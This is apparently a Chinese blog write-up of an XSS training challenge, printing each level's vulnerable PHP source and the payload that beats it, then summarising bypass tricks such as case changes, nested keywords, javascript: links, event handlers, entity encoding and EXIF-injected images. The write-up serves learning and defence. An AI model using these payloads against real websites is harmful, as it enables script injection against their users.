2019-01-03-xss_challenge

1.第一題沒啥攔截和編碼,直接顯示,源代碼如下:

ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>歡迎用戶".$str."</h2>";
payload:<script>alert(1)</script>
p1

p2

2.第二題的源代碼如下:

$str = $_GET["keyword"];
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>"."<center>
<form action=level2.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
payload:"><script>alert(1)</script>"這是直接把前面標簽閉合的意思

可以看到進行html特殊字符的編碼,經(jīng)過測試以后發(fā)現(xiàn),瀏覽器進行所謂的URL編碼,然后發(fā)送到服務器端解碼以后進行HTML實體編碼,對',",<,>,&符號進行編碼,注意單引號編碼不是默認的,然后返回前端被瀏覽器解析,還原成xss payload彈窗,所以這是html編碼只能防范存儲型漏洞的意思?


p3

先看下去
3.第三題源碼如下:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level3.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload: 123456' onfocus=alert(document.domain) autofocus//查了一下,網(wǎng)上說這個autofocus是當頁面加載時自動獲得焦點,然后onfocus是指定獲得焦點時應該觸發(fā)的事件.

顯然是做了代替,去掉了所有的大于小于號,那就只能用事件觸發(fā)了.
4.第四道同三
5.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
payload:1"><iframe src=javascript:alert(1)>

經(jīng)測試,這道題目轉(zhuǎn)換了script和on標簽,那就嵌套或者偽協(xié)議


p4

然后發(fā)現(xiàn)嵌套不行,因為這個是轉(zhuǎn)換來著.....不是直接凈化掉
然后就是直接上偽協(xié)議了.


p5

6.源代碼如下:

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hRef=javascript:alert(1)>xss</a>>

這道題試了挺久,結(jié)果發(fā)現(xiàn)啥方法都不行,然后看了下答案,發(fā)現(xiàn),我去,居然沒做大小寫轉(zhuǎn)換...,直接大小寫繞過就可以了.


p6

7.源代碼如下:

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hrhrefef=javasscriptcript:alert(1)>xss</a>>

主要嘗試了以后發(fā)現(xiàn)script標簽和href標簽都不見衔瓮,所以考慮嵌套的手段來繞過防護热鞍,最后使用<a>標簽來完成


p7

8.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level7.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';
?>
payload:java&#115;cript:alert(1)

經(jīng)過自己一波嘗試,發(fā)現(xiàn)全部轉(zhuǎn)小寫了偷办,然后是直接替換了澄港,on,href,script等關鍵詞語都被替換了,這種嵌套废岂,偽協(xié)議狱意,大小寫全都失效了详囤,只能看一波writeup,結(jié)果發(fā)現(xiàn)他是用編碼繞過的,可以可以。该贾。捌臊。。此處進行了html編碼來繞過六荒。


p8

9.源代碼如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情鏈接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的鏈接不合法?有沒有卵皂!">友情鏈接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情鏈接</a></center>';}
?>
payload:javascrip&#116;:alert(1)//http://xxx.com

看源代碼可知道其實它里面會檢查有沒有http://在字符串里面灯变,如果沒有的話就直接跳轉(zhuǎn)不成功,然后凈化是先小寫滚粟,然后替換刃泌,所以還是采用Unicode編碼來繞,接著直接后面帶上http://,但是這里要使用//注釋符耙替,注釋掉后面的http://,不然會不成功俗扇。


p9

10.源代碼如下:

$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
payload:123456" onmouseover=alert(document.domain) type="text

第十題主要是要讓挑戰(zhàn)者學會看源代碼铜幽,這次是看不到,所以你只能看到輸入點除抛,輸出點是看不到的镶殷,需要手動把他找出來,這就需要找到hidden,在前端去掉之后把輸出點找出來,這里的輸出點是hidden,經(jīng)實測t_link和t_history不是輸出點颗管,所以不能用<,>然后就只能用事件輸出了滓走,這里用onmmouseover來觸發(fā)。


p10.jpg

11.源代碼如下所示:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>沒有找到和".htmlspecialchars($str)."相關的結(jié)果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
payload:1" onmouseover=alert(1)

這道題目和前面差不多,直接把hidden menu找出來然后直接上事件觸發(fā)就可以了。而其中這個hidden的值就是包頭里面的referer字段唯欣,所以burp抓包也是一樣的。


p11

12.這道題目也是隱藏鍵值,然后改了user-agent的值插入xss代碼.

<input name="t_ua" value="Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" type="hidden">
修改為:
<input name="t_ua" value="1" onmouseover=alert(1)>

p12

這里介紹一下wooyun上面一個上傳新思路瓢剿,通過上傳圖片修改圖片exif信息插入xss代碼间狂,平臺在查看xss代碼的時候就可以直接執(zhí)行了火架。
https://bugs.shuimugan.com/bug/view?bug_no=194934
13.如上:
p13

14.該題目為cookie注入xss代碼,如下:
p14

15.這道題目主要是讓人學習一波圖片上傳插入xss代碼的思路炼列,主要是學習利用exiftool改變圖片的exif信息即可俭尖。Kali中安裝了exiftool以后直接查看并修改插入洞翩,上傳以后如果網(wǎng)站程序會查看圖片exif信息的話那就會執(zhí)行這些代碼了。
p15

p16

確實是一個很騷的思路來著已亥。来屠。震鹉。捆姜。

整理一下xss繞過防護的思路:
1.大小寫繞過泥技,如果過濾了一些關鍵詞,比如script等珊豹,直接大小寫試試,對應的解決方案就是直接將輸入轉(zhuǎn)小寫蜕便,解決忽妒。
2.偽協(xié)議,即利用一些標簽,如img, iframe,a href等等鸯檬,eg:<iframe src=javascript:alert(1)>,對應防御偽協(xié)議可以直接過濾掉所謂的一些偽協(xié)議標簽就可以了螺垢。
3.嵌套,用于和大小寫繞過一樣的防護情況功茴。孽亲。。
4.事件觸發(fā)返劲,這樣可以處理一些過濾<,>等情況篮绿,例如onmouseover,onfocus等亲配,過濾on可解決。
5.善于利用注釋符號犬钢,注釋一些信息。
6.編碼繞過坡贺,例如stringformcharcode,html編碼繞過等等箱舞。
7.上傳圖片含有xss代碼的exif信息

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末晴股,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子电湘,更是在濱河造成了極大的恐慌寂呛,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,919評論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件幻妓,死亡現(xiàn)場離奇詭異劫拢,居然都是意外死亡,警方通過查閱死者的電腦和手機妹沙,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,567評論 3 392
  • 文/潘曉璐 我一進店門熟吏,熙熙樓的掌柜王于貴愁眉苦臉地迎上來分俯,“玉大人,你說我怎么就攤上這事缸剪⌒咏冢” “怎么了典阵?”我有些...
    開封第一講書人閱讀 163,316評論 0 353
  • 文/不壞的土叔 我叫張陵镊逝,是天一觀的道長。 經(jīng)常有香客問我歹啼,道長座菠,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,294評論 1 292
  • 正文 為了忘掉前任拓萌,我火速辦了婚禮微王,結(jié)果婚禮上品嚣,老公的妹妹穿的比我還像新娘。我一直安慰自己腰根,他們只是感情好额嘿,可當我...
    茶點故事閱讀 67,318評論 6 390
  • 文/花漫 我一把揭開白布劣挫。 她就那樣靜靜地躺著,像睡著了一般球拦。 火紅的嫁衣襯著肌膚如雪帐我。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,245評論 1 299
  • 那天谣光,我揣著相機與錄音芬为,去河邊找鬼蟀悦。 笑死日戈,一個胖子當著我的面吹牛孙乖,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播弯屈,決...
    沈念sama閱讀 40,120評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼越妈,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了酌住?” 一聲冷哼從身側(cè)響起阎抒,我...
    開封第一講書人閱讀 38,964評論 0 275
  • 序言:老撾萬榮一對情侶失蹤且叁,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后欺矫,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體展氓,經(jīng)...
    沈念sama閱讀 45,376評論 1 313
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,592評論 2 333
  • 正文 我和宋清朗相戀三年未妹,在試婚紗的時候發(fā)現(xiàn)自己被綠了空入。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片歪赢。...
    茶點故事閱讀 39,764評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖迂烁,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情藏斩,我是刑警寧澤却盘,帶...
    沈念sama閱讀 35,460評論 5 344
  • 正文 年R本政府宣布,位于F島的核電站兆览,受9級特大地震影響塞关,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜小压,卻給世界環(huán)境...
    茶點故事閱讀 41,070評論 3 327
  • 文/蒙蒙 一椰于、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧蜻牢,春花似錦偏陪、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,697評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽宝泵。三九已至儿奶,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間闯捎,已是汗流浹背许溅。 一陣腳步聲響...
    開封第一講書人閱讀 32,846評論 1 269
  • 我被黑心中介騙來泰國打工贤重, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留清焕,地道東北人。 一個月前我還...
    沈念sama閱讀 47,819評論 2 370
  • 正文 我出身青樓滚停,卻偏偏與公主長得像粥惧,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子起惕,可洞房花燭夜當晚...
    茶點故事閱讀 44,665評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 第一部分 HTML&CSS整理答案 1. 什么是HTML5疤祭? 答:HTML5是最新的HTML標準饵婆。 注意:講述HT...
    kismetajun閱讀 27,476評論 1 45
  • 之前積累了XSS 有一段時間侨核,因為目前開始了一件有趣的工程,需要整合非常多的知識搓译,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,058評論 0 16
  • #xss 我認為xss漏洞可以根據(jù)可控變量的輸出的位置不同來進行分類 1.在html標簽中輸出 1.1在一般標簽中...
    Der_H閱讀 1,967評論 0 0
  • $HTML些己, HTTP,web綜合問題 1涯冠、前端需要注意哪些SEO 2逼庞、 的title和alt有什么區(qū)別 3、HT...
    Hebborn_hb閱讀 4,596評論 0 20
  • 一派任、健康氣質(zhì) (健康鍛煉3次)健身房運動3次。現(xiàn)在主要是練瑜伽师逸,碰到舞蹈課也跟著去跳跳颤诀,出出汗。 二崖叫、思想品格 偶...
    梨渦淺笑0812閱讀 193評論 0 0